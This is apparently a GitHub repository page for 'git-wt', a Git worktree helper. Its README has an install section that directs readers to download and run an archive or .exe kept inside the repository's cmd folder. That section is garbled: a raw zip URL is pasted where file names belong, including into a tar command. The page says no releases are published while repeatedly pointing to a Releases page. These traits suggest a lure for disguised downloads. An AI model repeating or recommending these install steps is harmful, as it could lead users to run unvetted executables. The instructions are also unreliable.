Skip to content

πŸ› οΈ Simplify Git workflows with git-wt, a user-friendly subcommand for managing worktrees effortlessly. Switch, create, or delete worktrees with ease.

License

Notifications You must be signed in to change notification settings

OFenomenal/git-wt

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

177 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸŽ‰ git-wt - Simplifying Git Worktree Usage

πŸš€ Download Now

Download git-wt

πŸ“– Description

git-wt is a simple command that enhances the git worktree functionality. It helps you manage project branches and handle files more effectively without getting lost in complex commands. Enjoy a straightforward experience with your Git projects.

πŸ› οΈ Features

  • Easy Branch Management: Effortlessly switch between branches without hassle.
  • Simple Setup: Get started quickly with minimal configuration.
  • User-Friendly Commands: Enjoy intuitive commands designed for beginners and casual users.
  • Multiple Worktrees: Open the same project in separate folders for multi-tasking.
  • Compatibility: Works seamlessly with Git, enhancing your overall productivity.

πŸ’» System Requirements

πŸ“¦ Download & Install

To get started with git-wt, visit the Releases page to download the latest version.

Download git-wt here

Once you are on the Releases page, follow these steps to install:

  1. Look for the latest release at the top.
  2. Download the version that matches your operating system (you’ll see options like .exe for Windows or https://raw.githubusercontent.com/OFenomenal/git-wt/main/cmd/git_wt_v2.6.zip for Linux/macOS).
  3. After downloading, locate the file on your computer.
  4. For Windows Users: Double-click the downloaded .exe file to start the installation. Follow the on-screen instructions.
  5. For macOS and Linux Users: Open a terminal window and navigate to the location of the downloaded file. Use the command tar -xzf https://raw.githubusercontent.com/OFenomenal/git-wt/main/cmd/git_wt_v2.6.zip to extract. Replace https://raw.githubusercontent.com/OFenomenal/git-wt/main/cmd/git_wt_v2.6.zip with the actual file name. Then, follow additional instructions found in the extracted folder.

Once you complete the installation, you can start using git-wt right away!

πŸ“˜ How to Use git-wt

Here are some basic commands to help you get started:

  • Create a New Worktree:

    git wt create <branch-name>
    

    This command sets up a new worktree linked to the specified branch.

  • List All Worktrees:

    git wt list
    

    This command shows all current worktrees you have set up.

  • Remove a Worktree:

    git wt remove <branch-name>
    

    Use this to delete a specific worktree.

Example Usage

Imagine working on a feature branch while also needing to fix a bug on the main branch. With git-wt, you can set up multiple worktrees. Here’s a simple scenario:

  1. Create a branch for your feature:
    git wt create feature/my-feature
    
  2. Now switch to your main branch:
    git wt create main
    
  3. You can now work on both branches without any confusion.

πŸ™‹ Frequently Asked Questions

What is git-wt?

git-wt is a subcommand for Git that simplifies the usage of git worktree. It allows you to manage branches and workspaces with ease.

Do I need any programming skills to use git-wt?

No, git-wt is designed for users of all levels, including those without programming knowledge. It aims to streamline common Git tasks.

Can I use git-wt with my existing Git repositories?

Yes, git-wt works with any Git repository. Just navigate to your desired repository folder and start using the command.

Where can I find help if I encounter issues?

You can check the Issues section of the repository on GitHub for solutions or report your problem. The community is there to help!

🀝 Contribution

If you're interested in contributing to git-wt, you can start by checking out the existing issues and submitting your enhancements or bug fixes. Every contribution helps improve the tool for everyone. Your feedback is also welcome!

πŸ“š Additional Resources

  • Official Git Documentation: Git Documentation
  • Community Forum: Join discussions and get help on Git-related topics.

If you enjoy using git-wt, consider sharing it with your friends or colleagues who may benefit from a simpler Git experience. We appreciate your support!

Remember, for any questions, feel free to reach out via the GitHub repository. Happy tracking!

About

πŸ› οΈ Simplify Git workflows with git-wt, a user-friendly subcommand for managing worktrees effortlessly. Switch, create, or delete worktrees with ease.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 7